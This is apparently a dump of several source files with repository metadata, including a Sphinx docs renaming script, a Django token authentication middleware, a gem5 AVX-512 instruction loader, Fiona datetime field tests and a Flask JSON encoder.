subs = {r[1]: r[2] for r in renamed}
reg = re.compile('(\\"[a-zA-Z0-9\\.\\/\\?\\:@\\-_=#]+\\.([a-zA-Z]){2,6}' '([a-zA-Z0-9\\.\\&\\/\\?\\:@\\-_=#])*\\")')
for r, dirs, files in os.walk(root):
for name in files:
if os.path.splitext(name)[-1] != ".html":
continue
full = os.path.join(r, name)
with open(full, "r", encoding="utf-8") as f:
content = f.read()
find = reg.findall(content)
repl = []
for f in find:
if f[0].startswith("http"):
continue
for k, v in subs.items():
if k == v:
raise ValueError("%r == %r" % (k, v))
if ('"%s' % k) in f[0]:
repl.append((f[0], f[0].replace('"%s' % k, '"%s' % v)))
if ("/%s" % k) in f[0]:
repl.append((f[0], f[0].replace("/%s" % k, "/%s" % v)))
if len(repl) == 0:
continue
print("update %r" % full)
for k, v in repl:
content = content.replace(k, v)
with open(full, "w", encoding="utf-8") as f:
f.write(content)
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
root = sys.argv[-1]
else:
root = "../../build/docs/html"
print("look into %r" % root)
ren = rename_folder(root)
if len(ren) == 0:
ren = [
("", "_static", "static"),
("", "_images", "images"),
("", "_downloads", "downloads"),
("", "_sources", "sources"),
("", "_modules", "modules"),
]
replace_files(root, ren)
print("done.")
| 31.764706 | 120 | 0.47037 |
7bf451ec8380449c011f8f4e9633427887dc3501 | 1,035 | py | Python | kollect/middleware/auth.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | null | null | null | kollect/middleware/auth.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | null | null | null | kollect/middleware/auth.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | null | null | null | from django.contrib.auth.models import AnonymousUser
from django.utils.functional import SimpleLazyObject
from kollect.models import User
from kollect.utils.auth import parse_token, security_hash
def get_user(header):
if not header.startswith("Token "):
return AnonymousUser()
token = header.split(" ", 1)[1]
payload = parse_token(token)
if not payload:
return AnonymousUser()
try:
user = User.objects.get(id=payload["uid"])
except (TypeError, KeyError, User.DoesNotExist):
print("cant find user")
return AnonymousUser()
if security_hash(user) != payload["sh"]:
return AnonymousUser()
return user
class JWSTokenAuthenticationMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
header = request.META.get("HTTP_AUTHORIZATION")
if header:
request.user = SimpleLazyObject(lambda: get_user(header))
return self.get_response(request)
| 26.538462 | 69 | 0.686957 |
18c4129c88b31757e09434697cbe2e94d1b89608 | 2,831 | py | Python | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/__init__.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 2 | 2021-01-15T17:32:18.000Z | 2021-12-21T02:53:58.000Z | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/__init__.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 3 | 2021-03-26T20:33:59.000Z | 2022-01-24T22:54:03.000Z | src/arch/x86/isa/insts/simd512/floating_point/data_transfer/__init__.py | jyhuang91/gem5-avx | f988da46080f8db49beb39e20af437219f3aa4cb | [
"BSD-3-Clause"
] | 3 | 2021-03-27T16:36:19.000Z | 2022-03-28T18:32:57.000Z | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
categories = [
"valign",
"vcomiss",
"vpbroadcast",
"vbroadcastsd",
"vbroadcastss",
"vblendps",
"vextract",
"vinsertps",
"vinsert",
"vmovd",
"vmovlhps",
"vmovq",
"vmovhpd",
"vmovdqa",
"vmovddup",
"vmovdqu",
"vmovaps",
"vmovapd",
"vmovups",
"vmovupd",
"vmovss",
"vmovsd",
"vmovsldup",
"vmovshdup",
"vpmovdq",
"vblendps",
"vpermilps",
"vpermilpd",
"vpternlog",
"vpshufd",
"vpextrq",
"vshufps",
"vunpcks",
"vzeroupper",
]
microcode = '''
# SSE instructions
'''
for category in categories:
exec("from . import {s} as cat".format(s=category))
microcode += cat.microcode
| 34.950617 | 72 | 0.731544 |
4de8053074ae1c4460d57490daef1e89791fefee | 28,669 | py | Python | tests/test_datetime.py | jGaboardi/Fiona | d36e0c897c545e0e51fe759e540c85c117bf3fc1 | [
"BSD-3-Clause"
] | 778 | 2015-01-03T18:29:34.000Z | 2022-03-31T03:17:53.000Z | tests/test_datetime.py | jGaboardi/Fiona | d36e0c897c545e0e51fe759e540c85c117bf3fc1 | [
"BSD-3-Clause"
] | 848 | 2015-01-07T17:16:10.000Z | 2022-03-27T23:14:58.000Z | tests/test_datetime.py | jGaboardi/Fiona | d36e0c897c545e0e51fe759e540c85c117bf3fc1 | [
"BSD-3-Clause"
] | 195 | 2015-01-29T21:48:37.000Z | 2022-03-25T15:18:24.000Z | """
See also test_rfc3339.py for datetime parser tests.
"""
from collections import OrderedDict
import fiona
from fiona._env import get_gdal_version_num, calc_gdal_version_num
import pytest
from fiona.errors import DriverSupportError
from fiona.rfc3339 import parse_time, parse_datetime
from .conftest import get_temp_filename
from fiona.env import GDALVersion
import datetime
from fiona.drvsupport import (supported_drivers, driver_mode_mingdal, _driver_converts_field_type_silently_to_str,
_driver_supports_field, _driver_converts_to_str, _driver_supports_timezones,
_driver_supports_milliseconds, _driver_supports_mode)
import pytz
from pytz import timezone
gdal_version = GDALVersion.runtime()
def get_schema(driver, field_type):
if driver == 'GPX':
return {'properties': OrderedDict([('ele', 'float'),
('time', field_type)]),
'geometry': 'Point'}
if driver == 'GPSTrackMaker':
return {
'properties': OrderedDict([('name', 'str'), ('comment', 'str'), ('icon', 'int'), ('time', field_type)]),
'geometry': 'Point'}
if driver == 'CSV':
return {"properties": {"datefield": field_type}}
return {"geometry": "Point",
"properties": {"datefield": field_type}}
def get_records(driver, values):
if driver == 'GPX':
return [{"geometry": {"type": "Point", "coordinates": [1, 2]},
"properties": {'ele': 0, "time": val}} for val in values]
if driver == 'GPSTrackMaker':
return [{"geometry": {"type": "Point", "coordinates": [1, 2]},
"properties": OrderedDict([('name', ''), ('comment', ''), ('icon', 48), ('time', val)])} for
val in values]
if driver == 'CSV':
return [{"properties": {"datefield": val}} for val in values]
return [{"geometry": {"type": "Point", "coordinates": [1, 2]},
"properties": {"datefield": val}} for val in values]
def get_schema_field(driver, schema):
if driver in {'GPX', 'GPSTrackMaker'}:
return schema["properties"]["time"]
return schema["properties"]["datefield"]
def get_field(driver, f):
if driver in {'GPX', 'GPSTrackMaker'}:
return f["properties"]["time"]
return f['properties']['datefield']
class TZ(datetime.tzinfo):
def __init__(self, minutes):
self.minutes = minutes
def utcoffset(self, dt):
return datetime.timedelta(minutes=self.minutes)
def generate_testdata(field_type, driver):
""" Generate test cases for test_datefield
Each test case has the format [(in_value1, true_value as datetime.*object),
(in_value2, true_value as datetime.*object), ...]
"""
# Test data for 'date' data type
if field_type == 'date':
return [("2018-03-25", datetime.date(2018, 3, 25)),
(datetime.date(2018, 3, 25), datetime.date(2018, 3, 25))]
# Test data for 'datetime' data type
if field_type == 'datetime':
return [("2018-03-25T22:49:05", datetime.datetime(2018, 3, 25, 22, 49, 5)),
(datetime.datetime(2018, 3, 25, 22, 49, 5), datetime.datetime(2018, 3, 25, 22, 49, 5)),
("2018-03-25T22:49:05.23", datetime.datetime(2018, 3, 25, 22, 49, 5, 230000)),
(datetime.datetime(2018, 3, 25, 22, 49, 5, 230000), datetime.datetime(2018, 3, 25, 22, 49, 5, 230000)),
("2018-03-25T22:49:05.123456", datetime.datetime(2018, 3, 25, 22, 49, 5, 123000)),
(datetime.datetime(2018, 3, 25, 22, 49, 5, 123456), datetime.datetime(2018, 3, 25, 22, 49, 5, 123000)),
("2018-03-25T22:49:05+01:30", datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(90))),
("2018-03-25T22:49:05-01:30", datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-90))),
(datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(90)),
datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(90))),
(datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-90)),
datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-90))),
(datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich')),
datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich'))),
(datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('US/Mountain')),
datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('US/Mountain'))),
(datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(60 * 24 - 15)),
datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(60 * 24 - 15))),
(datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-60 * 24 + 15)),
datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-60 * 24 + 15))),
("2018-03-25T22:49:05-23:45", datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(-60 * 24 + 15))),
("2018-03-25T22:49:05+23:45", datetime.datetime(2018, 3, 25, 22, 49, 5, tzinfo=TZ(60 * 24 - 15)))]
# Test data for 'time' data type
elif field_type == 'time':
return [("22:49:05", datetime.time(22, 49, 5)),
(datetime.time(22, 49, 5), datetime.time(22, 49, 5)),
("22:49:05.23", datetime.time(22, 49, 5, 230000)),
(datetime.time(22, 49, 5, 230000), datetime.time(22, 49, 5, 230000)),
("22:49:05.123456", datetime.time(22, 49, 5, 123000)),
(datetime.time(22, 49, 5, 123456), datetime.time(22, 49, 5, 123000)),
("22:49:05+01:30", datetime.time(22, 49, 5, tzinfo=TZ(90))),
("22:49:05-01:30", datetime.time(22, 49, 5, tzinfo=TZ(-90))),
(datetime.time(22, 49, 5, tzinfo=TZ(90)), datetime.time(22, 49, 5, tzinfo=TZ(90))),
(datetime.time(22, 49, 5, tzinfo=TZ(-90)), datetime.time(22, 49, 5, tzinfo=TZ(-90))),
(datetime.time(22, 49, 5, tzinfo=TZ(60 * 24 - 15)),
datetime.time(22, 49, 5, tzinfo=TZ(60 * 24 - 15))),
(datetime.time(22, 49, 5, tzinfo=TZ(-60 * 24 + 15)),
datetime.time(22, 49, 5, tzinfo=TZ(-60 * 24 + 15))),
("22:49:05-23:45", datetime.time(22, 49, 5, tzinfo=TZ(-60 * 24 + 15))),
("22:49:05+23:45", datetime.time(22, 49, 5, tzinfo=TZ(60 * 24 - 15)))]
def compare_datetimes_utc(d1, d2):
""" Test if two time objects are the same. Native times are assumed to be UTC"""
if d1.tzinfo is None:
d1 = d1.replace(tzinfo=TZ(0))
if d2.tzinfo is None:
d2 = d2.replace(tzinfo=TZ(0))
return d1 == d2
def test_compare_datetimes_utc():
""" Test compare_datetimes_utc """
d1 = datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(60))
d2 = datetime.datetime(2020, 1, 21, 11, 30, 0, tzinfo=TZ(0))
assert d1 == d2
assert compare_datetimes_utc(d1, d2)
d1 = datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(-60))
d2 = datetime.datetime(2020, 1, 21, 11, 30, 0, tzinfo=TZ(0))
assert not d1 == d2
assert not compare_datetimes_utc(d1, d2)
d1 = datetime.datetime(2020, 1, 21, 13, 0, 0, tzinfo=TZ(60))
d2 = datetime.datetime(2020, 1, 21, 5, 0, 0, tzinfo=TZ(-60 * 7))
assert d1 == d2
assert compare_datetimes_utc(d1, d2)
d1 = datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich'))
d2 = datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc)
assert d1 == d2
assert compare_datetimes_utc(d1, d2)
d1 = datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich'))
d2 = datetime.datetime(2020, 1, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('US/Mountain'))
assert d1 == d2
assert compare_datetimes_utc(d1, d2)
d1 = datetime.datetime(2020, 6, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('Europe/Zurich'))
d2 = datetime.datetime(2020, 6, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('US/Mountain'))
assert d1 == d2
assert compare_datetimes_utc(d1, d2)
def convert_time_to_utc(d):
""" Convert datetime.time object to UTC"""
d = datetime.datetime(1900, 1, 1, d.hour, d.minute, d.second, d.microsecond, d.tzinfo)
d -= d.utcoffset()
return d.time()
def compare_times_utc(d1, d2):
""" Test if two datetime.time objects with fixed timezones have the same UTC time"""
if d1.tzinfo is not None:
d1 = convert_time_to_utc(d1)
if d2.tzinfo is not None:
d2 = convert_time_to_utc(d2)
return d1.replace(tzinfo=None) == d2.replace(tzinfo=None)
def test_compare_times_utc():
"""
Test compare_times_utc
"""
d1 = datetime.time(12, 30, 0, tzinfo=TZ(60))
d2 = datetime.time(11, 30, 0, tzinfo=TZ(0))
assert compare_times_utc(d1, d2)
d1 = datetime.time(12, 30, 0, tzinfo=TZ(-60))
d2 = datetime.time(11, 30, 0, tzinfo=TZ(0))
assert not compare_times_utc(d1, d2)
d1 = datetime.time(13, 0, 0, tzinfo=TZ(60))
d2 = datetime.time(5, 0, 0, tzinfo=TZ(-60 * 7))
assert compare_times_utc(d1, d2)
d1 = datetime.datetime(2020, 6, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('MET')).timetz()
d2 = datetime.datetime(2020, 6, 21, 12, 0, 0, tzinfo=pytz.utc).astimezone(timezone('EST')).timetz()
assert compare_times_utc(d1, d2)
def get_tz_offset(d):
""" Returns a Timezone (sign, hours, minutes) tuples
E.g.: for '2020-01-21T12:30:00+01:30' ('+', 1, 30) is returned
"""
offset_minutes = d.utcoffset().total_seconds() / 60
if offset_minutes < 0:
sign = "-"
else:
sign = "+"
hours = int(abs(offset_minutes) / 60)
minutes = int(abs(offset_minutes) % 60)
return sign, hours, minutes
def test_get_tz_offset():
""" Test get_tz_offset"""
d = datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(90))
assert get_tz_offset(d) == ('+', 1, 30)
d = datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(-90))
assert get_tz_offset(d) == ('-', 1, 30)
d = datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(60 * 24 - 15))
assert get_tz_offset(d) == ('+', 23, 45)
d = datetime.datetime(2020, 1, 21, 12, 30, 0, tzinfo=TZ(-60 * 24 + 15))
assert get_tz_offset(d) == ('-', 23, 45)
def generate_testcases():
""" Generate test cases for drivers that support datefields, convert datefields to string or do not support
datefiels"""
_test_cases_datefield = []
_test_cases_datefield_to_str = []
_test_cases_datefield_not_supported = []
for field_type in ['time', 'datetime', 'date']:
# Select only driver that are capable of writing fields
for driver, raw in supported_drivers.items():
if _driver_supports_mode(driver, 'w'):
if _driver_supports_field(driver, field_type):
if _driver_converts_field_type_silently_to_str(driver, field_type):
_test_cases_datefield_to_str.append((driver, field_type))
else:
_test_cases_datefield.append((driver, field_type))
else:
_test_cases_datefield_not_supported.append((driver, field_type))
return _test_cases_datefield, _test_cases_datefield_to_str, _test_cases_datefield_not_supported
test_cases_datefield, test_cases_datefield_to_str, test_cases_datefield_not_supported = generate_testcases()
@pytest.mark.parametrize("driver, field_type", test_cases_datefield)
def test_datefield(tmpdir, driver, field_type):
"""
Test date, time, datetime field types.
"""
def _validate(val, val_exp, field_type, driver):
if field_type == 'date':
return val == val_exp.isoformat()
elif field_type == 'datetime':
# some drivers do not support timezones. In this case, Fiona converts datetime fields with a timezone other
# than UTC to UTC. Thus, both the datetime read by Fiona, as well as expected value are first converted to
# UTC before compared.
# Milliseconds
if _driver_supports_milliseconds(driver):
y, m, d, hh, mm, ss, ms, tz = parse_datetime(val)
if tz is not None:
tz = TZ(tz)
val_d = datetime.datetime(y, m, d, hh, mm, ss, ms, tz)
return compare_datetimes_utc(val_d, val_exp)
else:
# No Milliseconds
y, m, d, hh, mm, ss, ms, tz = parse_datetime(val)
if tz is not None:
tz = TZ(tz)
val_d = datetime.datetime(y, m, d, hh, mm, ss, ms, tz)
return compare_datetimes_utc(val_d, val_exp.replace(microsecond=0))
elif field_type == 'time':
# some drivers do not support timezones. In this case, Fiona converts datetime fields with a timezone other
# than UTC to UTC. Thus, both the time read by Fiona, as well as expected value are first converted to UTC
# before compared.
# Milliseconds
if _driver_supports_milliseconds(driver):
y, m, d, hh, mm, ss, ms, tz = parse_time(val)
if tz is not None:
tz = TZ(tz)
val_d = datetime.time(hh, mm, ss, ms, tz)
return compare_times_utc(val_d, val_exp)
else:
# No Milliseconds
y, m, d, hh, mm, ss, ms, tz = parse_time(val)
if tz is not None:
tz = TZ(tz)
val_d = datetime.time(hh, mm, ss, ms, tz)
return compare_times_utc(val_d, val_exp.replace(microsecond=0))
return False
schema = get_schema(driver, field_type)
path = str(tmpdir.join(get_temp_filename(driver)))
values_in, values_exp = zip(*generate_testdata(field_type, driver))
records = get_records(driver, values_in)
with fiona.open(path, 'w',
driver=driver,
schema=schema) as c:
c.writerecords(records)
with fiona.open(path, 'r') as c:
assert get_schema_field(driver, c.schema) == field_type
items = [get_field(driver, f) for f in c]
assert len(items) == len(values_in)
for val, val_exp in zip(items, values_exp):
assert _validate(val, val_exp, field_type, driver), \
"{} does not match {}".format(val, val_exp.isoformat())
@pytest.mark.parametrize("driver, field_type", test_cases_datefield_to_str)
def test_datefield_driver_converts_to_string(tmpdir, driver, field_type):
"""
Test handling of date, time, datetime for drivers that convert these types to string.
As the formatting can be arbitrary, we only test if the elements of a date / datetime / time object
is included in the string. E.g. for the PCIDSK driver if hour 22 from date.time(22:49:05) is in
'0000/00/00 22:49:05'.
"""
def _validate(val, val_exp, field_type, driver):
if field_type == 'date':
if (str(val_exp.year) in val and
str(val_exp.month) in val and
str(val_exp.day) in val):
return True
elif field_type == 'datetime':
if not _driver_supports_timezones(driver, field_type) and val_exp.utcoffset() is not None:
val_exp = convert_time_to_utc(val_exp)
# datetime fields can, depending on the driver, support:
# - Timezones
# - Milliseconds, respectively Microseconds
# No timezone
if val_exp.utcoffset() is None:
# No Milliseconds
if not _driver_supports_milliseconds(driver):
if (str(val_exp.year) in val and
str(val_exp.month) in val and
str(val_exp.day) in val and
str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val):
return True
else:
# Microseconds
if (str(val_exp.year) in val and
str(val_exp.month) in val and
str(val_exp.day) in val and
str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
str(val_exp.microsecond) in val):
return True
# Milliseconds
elif (str(val_exp.year) in val and
str(val_exp.month) in val and
str(val_exp.day) in val and
str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
str(int(val_exp.microsecond / 1000)) in val):
return True
# With timezone
else:
sign, hours, minutes = get_tz_offset(val_exp)
if minutes > 0:
tz = "{sign}{hours:02d}{minutes:02d}".format(sign=sign,
hours=int(hours),
minutes=int(minutes))
else:
tz = "{sign}{hours:02d}".format(sign=sign, hours=int(hours))
print("tz", tz)
# No Milliseconds
if not _driver_supports_milliseconds(driver):
if (str(val_exp.year) in val and
str(val_exp.month) in val and
str(val_exp.day) in val and
str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
tz in val):
return True
else:
# Microseconds
if (str(val_exp.year) in val and
str(val_exp.month) in val and
str(val_exp.day) in val and
str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
str(val_exp.microsecond) in val and
tz in val):
return True
# Milliseconds
elif (str(val_exp.year) in val and
str(val_exp.month) in val and
str(val_exp.day) in val and
str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
str(int(val_exp.microsecond / 1000)) in val and
tz in val):
return True
elif field_type == 'time':
# time fields can, depending on the driver, support:
# - Timezones
# - Milliseconds, respectively Microseconds
if not _driver_supports_timezones(driver, field_type) and val_exp.utcoffset() is not None:
val_exp = convert_time_to_utc(val_exp)
# No timezone
if val_exp.utcoffset() is None:
# No Milliseconds
if not _driver_supports_milliseconds(driver):
if (str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val):
return True
else:
# Microseconds
if (str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
str(val_exp.microsecond) in val):
return True
# Milliseconds
elif (str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
str(int(val_exp.microsecond / 1000)) in val):
return True
# With timezone
else:
sign, hours, minutes = get_tz_offset(val_exp)
if minutes > 0:
tz = "{sign}{hours:02d}{minutes:02d}".format(sign=sign,
hours=int(hours),
minutes=int(minutes))
else:
tz = "{sign}{hours:02d}".format(sign=sign, hours=int(hours))
# No Milliseconds
if not _driver_supports_milliseconds(driver):
if (str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
tz in val):
return True
else:
# Microseconds
if (str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
str(val_exp.microsecond) in val and
tz in val):
return True
# Milliseconds
elif (str(val_exp.hour) in val and
str(val_exp.minute) in val and
str(val_exp.second) in val and
str(int(val_exp.microsecond / 1000)) in val
and tz in val):
return True
return False
schema = get_schema(driver, field_type)
path = str(tmpdir.join(get_temp_filename(driver)))
values_in, values_exp = zip(*generate_testdata(field_type, driver))
records = get_records(driver, values_exp)
with pytest.warns(UserWarning) as record:
with fiona.open(path, 'w',
driver=driver,
schema=schema) as c:
c.writerecords(records)
assert len(record) == 1
assert "silently converts" in record[0].message.args[0]
with fiona.open(path, 'r') as c:
assert get_schema_field(driver, c.schema) == 'str'
items = [get_field(driver, f) for f in c]
assert len(items) == len(values_in)
for val, val_exp in zip(items, values_exp):
assert _validate(val, val_exp, field_type, driver), \
"{} does not match {}".format(val, val_exp.isoformat())
@pytest.mark.filterwarnings('ignore:.*driver silently converts *:UserWarning')
@pytest.mark.parametrize("driver,field_type", test_cases_datefield + test_cases_datefield_to_str)
def test_datefield_null(tmpdir, driver, field_type):
"""
Test handling of null values for date, time, datetime types for write capable drivers
"""
def _validate(val, val_exp, field_type, driver):
if (driver == 'MapInfo File' and field_type == 'time' and
calc_gdal_version_num(2, 0, 0) <= get_gdal_version_num() < calc_gdal_version_num(3, 1, 1)):
return val == '00:00:00'
if val is None or val == '':
return True
return False
schema = get_schema(driver, field_type)
path = str(tmpdir.join(get_temp_filename(driver)))
values_in = [None]
records = get_records(driver, values_in)
with fiona.open(path, 'w',
driver=driver,
schema=schema) as c:
c.writerecords(records)
with fiona.open(path, 'r') as c:
items = [get_field(driver, f) for f in c]
assert len(items) == 1
assert _validate(items[0], None, field_type, driver), \
"{} does not match {}".format(items[0], None)
@pytest.mark.parametrize("driver, field_type", test_cases_datefield_not_supported)
def test_datetime_field_unsupported(tmpdir, driver, field_type):
""" Test if DriverSupportError is raised for unsupported field_types"""
schema = get_schema(driver, field_type)
path = str(tmpdir.join(get_temp_filename(driver)))
values_in, values_out = zip(*generate_testdata(field_type, driver))
records = get_records(driver, values_in)
with pytest.raises(DriverSupportError):
with fiona.open(path, 'w',
driver=driver,
schema=schema) as c:
c.writerecords(records)
@pytest.mark.parametrize("driver, field_type", test_cases_datefield_not_supported)
def test_datetime_field_type_marked_not_supported_is_not_supported(tmpdir, driver, field_type, monkeypatch):
""" Test if a date/datetime/time field type marked as not not supported is really not supported
Warning: Success of this test does not necessary mean that a field is not supported. E.g. errors can occour due to
special schema requirements of drivers. This test only covers the standard case.
"""
if driver == "BNA" and GDALVersion.runtime() < GDALVersion(2, 0):
pytest.skip("BNA driver segfaults with gdal 1.11")
monkeypatch.delitem(fiona.drvsupport._driver_field_type_unsupported[field_type], driver)
schema = get_schema(driver, field_type)
path = str(tmpdir.join(get_temp_filename(driver)))
values_in, values_out = zip(*generate_testdata(field_type, driver))
records = get_records(driver, values_in)
is_good = True
try:
with fiona.open(path, 'w',
driver=driver,
schema=schema) as c:
c.writerecords(records)
with fiona.open(path, 'r') as c:
if not get_schema_field(driver, c.schema) == field_type:
is_good = False
items = [get_field(driver, f) for f in c]
for val_in, val_out in zip(items, values_out):
if not val_in == val_out:
is_good = False
except:
is_good = False
assert not is_good
def generate_tostr_testcases():
""" Flatten driver_converts_to_str to a list of (field_type, driver) tuples"""
cases = []
for field_type in _driver_converts_to_str:
for driver in _driver_converts_to_str[field_type]:
driver_supported = driver in supported_drivers
driver_can_write = _driver_supports_mode(driver, 'w')
field_supported = _driver_supports_field(driver, field_type)
converts_to_str = _driver_converts_field_type_silently_to_str(driver, field_type)
if driver_supported and driver_can_write and converts_to_str and field_supported:
cases.append((field_type, driver))
return cases
@pytest.mark.filterwarnings('ignore:.*driver silently converts *:UserWarning')
@pytest.mark.parametrize("driver,field_type", test_cases_datefield_to_str)
def test_driver_marked_as_silently_converts_to_str_converts_silently_to_str(tmpdir, driver, field_type, monkeypatch):
""" Test if a driver and field_type is marked in fiona.drvsupport.driver_converts_to_str to convert to str really
silently converts to str
If this test fails, it should be considered to replace the respective None value in
fiona.drvsupport.driver_converts_to_str with a GDALVersion(major, minor) value.
"""
monkeypatch.delitem(fiona.drvsupport._driver_converts_to_str[field_type], driver)
schema = get_schema(driver, field_type)
path = str(tmpdir.join(get_temp_filename(driver)))
values_in, values_out = zip(*generate_testdata(field_type, driver))
records = get_records(driver, values_in)
with fiona.open(path, 'w',
driver=driver,
schema=schema) as c:
c.writerecords(records)
with fiona.open(path, 'r') as c:
assert get_schema_field(driver, c.schema) == 'str'
def test_read_timezone_geojson(path_test_tz_geojson):
"""Test if timezones are read correctly"""
with fiona.open(path_test_tz_geojson) as c:
items = list(c)
assert items[0]['properties']['test'] == '2015-04-22T00:00:00+07:00'
| 43.437879 | 119 | 0.569291 |
63db1990aa68a257710894f48b6c13126400c844 | 372 | py | Python | submissions-api/app/main/encoder.py | sanger-tol/tol-submissions | 8dbbfaa98b1dfa09a09cb54cf1b2eb9d1dca5331 | [
"MIT"
] | null | null | null | submissions-api/app/main/encoder.py | sanger-tol/tol-submissions | 8dbbfaa98b1dfa09a09cb54cf1b2eb9d1dca5331 | [
"MIT"
] | null | null | null | submissions-api/app/main/encoder.py | sanger-tol/tol-submissions | 8dbbfaa98b1dfa09a09cb54cf1b2eb9d1dca5331 | [
"MIT"
] | null | null | null | # SPDX-FileCopyrightText: 2021 Genome Research Ltd.
#
# SPDX-License-Identifier: MIT
from connexion.apps.flask_app import FlaskJSONEncoder
from main.model import Base
class JSONEncoder(FlaskJSONEncoder):
include_nulls = False
def default(self, o):
if isinstance(o, Base):
return o.to_dict()
return FlaskJSONEncoder.default(self, o)
| 23.25 | 53 | 0.717742 |
8a410d44c66e892332923e60f2f110228ce177c9 | 1,365 | py | Python | Ago-Dic-2019/ERIK EDUARDO MONTOYA MARTINEZ/2doParcial/ApiMusicbrainz.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
] | 41 | 2017-09-26T09:36:32.000Z | 2022-03-19T18:05:25.000Z | Ago-Dic-2019/ERIK EDUARDO MONTOYA MARTINEZ/2doParcial/ApiMusicbrainz.py | Arbupa/DAS_Sistemas | 52263ab91436b2e5a24ce6f8493aaa2e2fe92fb1 | [
"MIT"
